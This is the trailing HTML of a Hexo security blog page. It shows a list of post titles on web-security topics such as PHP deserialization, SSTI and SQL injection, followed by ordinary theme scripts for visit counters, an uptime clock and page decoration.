href="/2020/04/26/%E5%85%B3%E4%BA%8Ephp%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%97%E7%AC%A6%E9%80%83%E9%80%B8%E7%9A%84%E6%80%9D%E8%80%83/">关于php反序列化字符逃逸的思考</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/04/23/%E5%A6%82%E4%BD%95%E8%AE%A9%E6%96%87%E4%BB%B6%E9%87%8CPHP%E4%BB%A3%E7%A0%81%E8%A2%AB%E6%9C%8D%E5%8A%A1%E5%99%A8%E8%A7%A3%E6%9E%90%E6%89%A7%E8%A1%8C/">如何让文件里PHP代码被服务器解析执行</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/04/21/%E8%99%8E%E7%AC%A6CTF2020--EasyLogin%20%20%20Write%20%20up/">虎符CTF2020--EasyLogin WP</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/27/python%20%E5%85%B3%E4%BA%8E%E6%B2%99%E7%9B%92%E9%80%83%E9%80%B8%E7%9A%84%E6%80%9D%E8%80%83/">关于python ssti的思考</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/11/13/%E5%85%B3%E4%BA%8Eupdatexml()%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%E7%9A%84%E6%80%9D%E8%80%83/">关于updatexml()报错注入的思考</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/10/cocos2d%E5%AE%98%E6%96%B9%E6%96%87%E6%A1%A3%E6%B1%89%E5%8C%96--Writing%20a%20cocos2d%20application/">cocos2d官方文档汉化--Writing a cocos2d application</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/03/hello-world/">Hello World</a></li></ul>




    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
        	                <span id="timeDate">载入天数...</span><span id="times">载入时分秒...</span>
<script>
    var now = new Date(); 
    function createtime() { 
        var grt= new Date("01/03/2019 12:39:00");//此处修改你的建站时间或者网站上线时间 
        now.setTime(now.getTime()+250); 
        days = (now - grt ) / 1000 / 60 / 60 / 24; dnum = Math.floor(days); 
        hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum); hnum = Math.floor(hours); 
        if(String(hnum).length ==1 ){hnum = "0" + hnum;} minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum); 
        mnum = Math.floor(minutes); if(String(mnum).length ==1 ){mnum = "0" + mnum;} 
        seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum); 
        snum = Math.round(seconds); if(String(snum).length ==1 ){snum = "0" + snum;} 
        document.getElementById("timeDate").innerHTML = "本站已安全运行 "+dnum+" 天 "; 
        document.getElementById("times").innerHTML = hnum + " 小时 " + mnum + " 分 " + snum + " 秒"; 
    } 
setInterval("createtime()",250);
</script>
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2019-2021 lexsd6
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank" title="快速、简洁且高效的博客框架">Hexo</a>  Theme <a href="https://github.com/MOxFIVE/hexo-theme-yelee" target="_blank" title="简而不减 Hexo 双栏博客主题  v3.5">Yelee</a> by MOxFIVE <i class="fa fa-heart animated infinite pulse"></i>
            </div>
        </div>
        
            <div class="visit">
                
                    
                        <span id="site-visit" title="本站到访数"><i class="fa fa-user" aria-hidden="true"></i><span id="busuanzi_value_site_uv"></span>
                        </span>
                    
                
                
                    <span>| </span>
                
                
                    
                        <span id="page-visit"  title="本页阅读量"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                  
                




            </div>
        
    </div>
</footer>
    </div>
    
<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 20;
                var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#" title="返回顶部"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="查看评论"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="转到底部"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        var oOpenInNew = {
            
            
            
            
            
            
             archives: ".archive-article-title", 
             miniArchives: "a.post-list-link", 
            
             friends: "#js-friends a", 
             socail: ".social a" 
        }
        for (var x in oOpenInNew) {
            $(oOpenInNew[x]).attr("target", "_blank");
        }
    
</script>

    <script>
        var originTitle = document.title;
        var titleTime;
        document.addEventListener("visibilitychange", function() {
            if (document.hidden) {
                document.title = "(つェ⊂) 我藏好了哦~ " + originTitle;
                clearTimeout(titleTime);
            }
            else {
                document.title = "(*´∇｀*) 被你发现啦~ " + originTitle;
                titleTime = setTimeout(function() {
                    document.title = originTitle;
                }, 2000);
            }
        })
    </script>

<script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
  </div>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>